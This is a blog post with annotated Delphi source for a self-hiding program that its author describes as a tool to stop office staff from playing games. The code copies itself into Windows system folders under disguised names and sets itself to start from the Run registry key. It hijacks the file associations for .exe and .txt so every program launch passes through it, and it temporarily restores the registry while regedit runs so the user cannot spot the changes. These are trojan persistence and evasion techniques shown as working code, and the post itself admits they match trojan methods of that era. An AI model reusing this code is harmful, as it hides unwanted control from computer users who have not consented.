DELPHI實現關閉指定程式,自身防殺

lykyl的自留地發表於2013-10-18

偶然翻到很久以前用DELPHI寫的一個小程式,實現功能是在後臺默默關閉符合條件的程式,並隱藏自身。編寫目的是為了防止辦公電腦執行遊戲。

實現原理是:

1、程式執行後將自身以不同的名稱一式三份存到系統各目錄中(依程式碼:WinODBC.exe 與 OLEDevice.exe 複製到系統目錄,ObjDDC.exe 複製到 Windows 目錄),將其中一個COPY寫到登錄檔 HKLM\Software\Microsoft\Windows\CurrentVersion\Run 的 SysOleRun 值裡開機自啟動,然後修改登錄檔 HKEY_CLASSES_ROOT 下 txtfile 與 exefile 的 shell\open\command,分別指向另兩個COPY,達到監控目的。注意:程式碼裡 Run 值寫的是「系統目錄\ObjDDC.exe」,檔案卻複製到「Windows目錄\ObjDDc.exe」,除非兩個目錄相同,否則開機自啟動所指向的檔案並不存在。

2、程式一旦啟用,會無條件重新複製三份COPY並重寫登錄檔關聯(程式碼每次啟動都直接呼叫 CopyFile 與 procSetReg(false),而不是先檢查再修復),然後再檢查系統是否執行在禁止名單中的程式,發現就殺死。(注意:下面貼出的 HK 主程式裡並沒有列舉程序或結束程序的程式碼,禁止名單與殺程序的邏輯可能在未貼出的 LoadDLL.pas 裡,本文無法核對。)

3、如果程式監控到使用者執行regedit則會將登錄檔改回正常值,當regedit退出後再將修改寫回,以防使用者發現。(實作方式:所有 .exe 都經由被劫持的 exefile 關聯交給 OLEDevice.exe 啟動,它用區分大小寫的子字串比對檢查命令列是否含有 'regedit',命中就先還原登錄檔、等待 regedit 結束、再重新寫入劫持值;所謂「正常值」是寫死在程式裡的預設值,並非安裝前備份的原值。這在防毒軟體還很落後的年代效果還是相當好的)

4、程式保留了解除安裝的功能,程式碼裡有寫:把程式改名為 lykyl.exe 執行,會還原 txtfile/exefile 的關聯並刪除 Run 裡的 SysOleRun 值;但散落在系統目錄與 Windows 目錄的三份COPY不會被刪除,需要手動清理。

自己感覺挺有意思,把程式碼發上來留個紀念。(安全提醒:劫持 HKCR\exefile\shell\open\command 再加 Run 鍵自啟動,正是同時期木馬常用的持久化手法;若直接刪掉 OLEDevice.exe 而沒有先還原 exefile 關聯,系統將無法啟動任何 .exe,清理時務必先改回登錄檔再刪檔。)

 

  1 //為了防止一些人上班就玩遊戲的惡習所編
  2 program HK;
  3 
  4 uses
  5   Windows,
  6   Messages,
  7   SysUtils,
  8   System,
  9   Classes,
 10   Registry,
 11   Forms,
 12   Controls,
 13   LoadDLL in 'LoadDLL.pas';
 14   
var
  I:Integer;            // loop index used when joining ParamStr(1..ParamCount) into pa
  SPath,WPath:PCHAR;    // system directory / Windows directory; 255-byte GetMem buffers owned by the main block
  pa:string;            // all command-line arguments re-joined with single spaces (ParamStr returns them unquoted,
                        // so an argument that contained spaces is re-split by whatever receives pa)
  hnd: THandle;         // handle of the named single-instance mutex, closed in the main block's finally
  sp:boolean;           // True only in the first running instance (mutex newly created); UserPass is a no-op otherwise
  sFileName:String;     // full path of this executable as reported by GetModuleFileName
 22 
 23 
 24 //function RegisterServiceProcess(dwProcessId, dwServiceType: DWord): Bool; stdcall;
 25 
 26 //function RegisterServiceProcess; external 'Kernel32.dll' Name 'RegisterServiceProcess';
 27 
 28 procedure procRun(exeName,exePath:PChar;trace:boolean);
 29 var
 30   SUInfo: TStartupInfo;
 31   ProcInfo: TProcessInformation;
 32 begin
 33 FillChar(SUInfo, SizeOf(SUInfo), #0);
 34 with SUInfo do
 35   begin
 36     cb := SizeOf(SUInfo);
 37     dwFlags := STARTF_USESHOWWINDOW;
 38     wShowWindow :=1;
 39   end;
 40 if CreateProcess(NIL,exeName, NIL, NIL, FALSE,CREATE_NEW_CONSOLE or NORMAL_PRIORITY_CLASS, NIL,exePath, SUInfo, ProcInfo) then
 41   begin
 42     if trace then
 43       WaitForSingleObject(ProcInfo.hProcess, INFINITE);
 44     CloseHandle(ProcInfo.hProcess);
 45     CloseHandle(ProcInfo.hThread);
 46   end;
 47 end;
 48 
{ Installs (rest = False) or removes (rest = True) the registry hooks.
  Uses the globals SPath and WPath filled in by the main block.

  rest = False – "install":
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SysOleRun
                                      = <SPath>\ObjDDC.exe
    HKCR\txtfile\shell\open\command   = <SPath>\WinODBC.exe %1
    HKCR\exefile\shell\open\command   = <SPath>\OLEDevice.exe %1 %*
    After this every .txt and every .exe opened through the shell is routed
    through one of the copies first.
    NOTE(review): the main block copies ObjDDC.exe into WPath (Windows
    directory) but the Run value points into SPath (system directory);
    unless both resolve to the same directory the autostart entry names a
    file that does not exist.  %1 is written unquoted, so a target path with
    spaces is split by the shell.

  rest = True – "restore":
    writes fixed values (<WPath>\NOTEPAD.exe %1 for txtfile, "%1" %* for
    exefile) and deletes SysOleRun.  The values that were in place before
    installation are never read or saved, so this is a reset to assumed
    defaults, not a true undo.

  OpenKey(..., True) creates any key that is missing.  Writing HKLM and HKCR
  requires write access to those hives; a failing Write*/DeleteValue
  presumably raises an ERegistryException, which is not caught here – only
  Reg.Free is guaranteed by the try/finally. }
procedure procSetReg(rest:boolean);
var
   Reg:TRegistry;
begin
   Reg:=Tregistry.Create;
   try
   if rest then
   begin
     reg.rootkey:=HKEY_CLASSES_ROOT;
     if reg.OpenKey('\txtfile\shell\open\command',true) then
        reg.WriteExpandString('',WPath+'\NOTEPAD.exe %1');   // fixed default, not the saved original
     reg.closekey;
     if reg.OpenKey('\exefile\shell\open\command',true) then
        reg.WriteExpandString('','"%1" %*');                 // stock exefile command
     reg.closekey;
     reg.RootKey:=HKEY_LOCAL_MACHINE;
     if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
        reg.DeleteValue('SysOleRun');                        // remove autostart entry
      reg.closekey;
   end
   else
   begin
      reg.RootKey:=HKEY_LOCAL_MACHINE;
      if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
          reg.writestring('SysOleRun',spath+'\ObjDDC.exe');  // autostart; see path mismatch note above
      Reg.CloseKey;
      reg.rootkey:=HKEY_CLASSES_ROOT;
      if reg.OpenKey('\txtfile\shell\open\command',true) then
          reg.WriteExpandString('',spath+'\WinODBC.exe %1');  // .txt opens go through WinODBC.exe
      reg.closekey;
      if reg.OpenKey('\exefile\shell\open\command',true) then
          reg.WriteExpandString('',spath+'\OLEDevice.exe %1 %*');  // every .exe launch goes through OLEDevice.exe
      reg.closekey;
   end;
  finally
    Reg.Free;
  end;
end;
 87 
{ Plays a tone on the PC speaker by programming the 8253/8254 timer directly.
    feq   – frequency in Hz (default 1200).  feq = 0 divides by zero; for
            feq < 19 the divisor (scale div feq) exceeds 65535 and is
            truncated when stored into the Word temp.
    delay – duration in ms handed to Sleep (default 1).
  Uses raw IN/OUT port instructions from user mode.  NOTE(review): this only
  works where the process is allowed direct port I/O – presumably the Win9x
  systems this program targets; NT-family Windows normally raises a
  privileged-instruction exception on the first IN. }
procedure BeepEx(feq:word=1200;delay:word=1);

  // Silence: clear bits 0-1 of port $61 (timer-2 gate and speaker data).
  procedure BeepOff;
   begin
     asm
       in al,$61;
       and al,$fc;
       out $61,al;
     end;
  end;
const
  scale=1193180;   // PIT input clock in Hz
var
  temp:word;       // 16-bit divisor loaded into timer channel 2
begin
  temp:=scale div feq;
  asm
    in al,61h;       // enable timer-2 gate and speaker data (bits 0-1)
    or al,3;
    out 61h,al;
    mov al,$b6;      // 8254 command word: channel 2, lo/hi byte access, mode 3 (square wave), binary
    out 43h,al;
    mov ax,temp;
    out 42h,al;      // divisor low byte
    mov al,ah;
    out 42h,al;      // divisor high byte
  end;
  sleep(delay);
  beepoff;
end;
118 
{ "Unauthorized user" warning.  Does nothing unless sp is True (i.e. this is
  the first running instance).  Reads the logged-on user name with
  GetUserName and, if it is not the hard-coded 'lykyl', shows a message box,
  sends WM_SYSCOMMAND/SC_MONITORPOWER (apparently meant to blank the screen
  and switch it back on), plays two pairs of 1500/3000 Hz tones through
  BeepEx and shows a second message box.
  It only warns – every caller goes on to launch the requested program
  afterwards, so this is not an access control.
  Caveats:
    - The GetUserName return value is ignored; on failure UserName holds
      uninitialized GetMem memory.
    - NOTE(review): UserName is a PChar compared against a string literal –
      confirm the compiler performs a content comparison here.
    - SendMessage is called with hWnd = 0, which is not HWND_BROADCAST, so the
      monitor-power messages presumably reach no window at all.
    - 'for a := 1 to 1' is a single-iteration loop, i.e. a no-op wrapper. }
procedure UserPass();
var
   a,b:integer;
   t:longword;
   UserName:PCHAR;
begin
   if sp then
      begin
       t:=255;                          // in/out buffer size for GetUserName
      GetMem(UserName,255);
      try
        getusername(UserName,t);         // result not checked
        if UserName<>'lykyl' then
          begin
             // "Unauthorized user, operation restricted!" / "System warning!"
             messagebox(0,'非法使用者,操作限制!','系統警告!',MB_OK);
             for a:=1 to 1 do
              begin
              SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, 0);
               for b:=1 to 2 do
                 begin
                      BeepEx(1500,200);
                      beepex(3000,200);
                 end;
               SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, -1);   // -1 = monitor on
               // "Unauthorized user identity confirmed" / "System warning!"
               messagebox(0,'非法使用者身份確定','系統警告!',MB_OK);
              end;
          end;
        finally
          freemem(UserName);
        end;
      end;
end;
151   {$R *.RES}
152 
{ Program entry point.  Every run re-installs the hooks; which extra action
  is taken depends on the file name this copy was launched under and on its
  arguments.

  1. Single-instance check: a named mutex ('irgendwaseinmaliges' – a fixed
     string that is an easy static indicator) is created; sp becomes True
     only for the first instance.  sp gates nothing but UserPass.
  2. RegisterServiceProcess (commented out here and in the finally block) is
     the Win9x/ME-only kernel32 call that hides a process from the
     Ctrl+Alt+Del task list; presumably disabled because NT-family kernel32
     does not export it.
  3. SPath / WPath receive the system and Windows directories.
     NOTE(review): GetModuleFileName expects an HMODULE (0 for the running
     executable); GetCurrentProcess returns a process pseudo-handle.  Whether
     this yields the right path is platform-dependent – confirm on the
     target OS.  The PChar round-trip then trims sFileName at the first NUL.
  4. A copy named exactly 'lykyl.exe' (case-sensitive compare) acts as the
     uninstaller: procSetReg(True) resets the associations and deletes the
     Run value.  The three copies on disk are NOT removed.
  5. Any other name: overwrite the three copies (CopyFile with
     bFailIfExists = False; return values ignored), re-write the hooks, then
     join the arguments into pa.
  6. With arguments, dispatch on the copy's own name.  The compares use the
     upper-case 'WINODBC.EXE' / 'OLEDEVICE.EXE' while the files are written
     as 'WinODBC.exe' / 'OLEDevice.exe'; Delphi string '=' is case-sensitive,
     so these branches only run if the OS reports the module name in upper
     case (presumably true on the Win9x systems this was written for –
     confirm).
       - WINODBC.EXE  (txtfile hook): UserPass warning, then hand the
         arguments to <WPath>\NOTEPAD.EXE.
       - OLEDEVICE.EXE (exefile hook): UserPass warning; if the command line
         contains the substring 'regedit' (case-sensitive, so 'REGEDIT.EXE'
         is not matched), restore the registry, run the target and WAIT for
         it to exit, then re-install the hooks; otherwise just launch the
         target.  UserPass never blocks the launch – it only warns.
     With no arguments (e.g. started from the Run key) the program only
     re-copies, re-hooks and exits.
  7. finally: release the two path buffers and the mutex handle. }
begin
   hnd := CreateMutex(nil, True, 'irgendwaseinmaliges');
   if GetLastError = ERROR_ALREADY_EXISTS then
      sp:=false                          // another instance already holds the mutex
   else
      sp:=true;
  //RegisterServiceProcess(0, RSP_SIMPLE_SERVICE);
  GetMem(SPath,255);
  GetMem(WPath,255);
  GetSystemDirectory(SPath,255);
  GetWindowsDirectory(WPath,255);
  SetLength(sFileName,255);
  GetModuleFileName(GetCurrentProcess,Pchar(sFileName),255);   // see note 3 above
  sFileName:=Pchar(sFileName);                                  // trim at first NUL
  try
    if ExtractFileName(sFileName)='lykyl.exe' then
       procSetReg(true)                  // uninstall: registry only, copies stay
    else
    begin
    Copyfile(pchar(sFileName),pchar(spath+'\WinODBC.exe'),false);    // txtfile hook
    Copyfile(pchar(sFileName),pchar(spath+'\OLEDevice.exe'),false);  // exefile hook
    Copyfile(pchar(sFileName),pchar(WPath+'\ObjDDc.exe'),false);     // Windows dir; Run value points to SPath instead
    procSetReg(false);
    for i:=1 to ParamCount do
        if i=1 then
           pa:=ParamStr(i)
        else
           pa:=pa+' '+ParamStr(i);
    if Pa <>'' then
      begin
          if ExtractFileName(sFileName)='WINODBC.EXE' then
            begin
              UserPass();
              procRun(PChar(WPath+'\NOTEPAD.EXE '+pa),PChar(ExtractFilePath(WPath+'\')),false);
            end
          else
              if ExtractFileName(sFileName)='OLEDEVICE.EXE' then
               begin
                  UserPass();
                  if AnsiStrPos(pchar(pa),'regedit')<>nil then
                     begin
                          procSetReg(true);                                 // hide the hooks while regedit runs
                          procRun(PChar(pa),PChar(ExtractFilePath(pa)),true); // blocks until regedit exits
                          procSetReg(false);                                // put the hooks back
                     end
                  else
                     begin
                         procRun(PChar(pa),pchar(extractfilepath(pa)),false);
                     end;
               end;
      end;
      end;
  finally
    freemem(SPath);
    freemem(WPath);
    if hnd <> 0 then CloseHandle(hnd);
//    RegisterServiceProcess(0, RSP_UNREGISTER_SERVICE);
  end;
end.

 
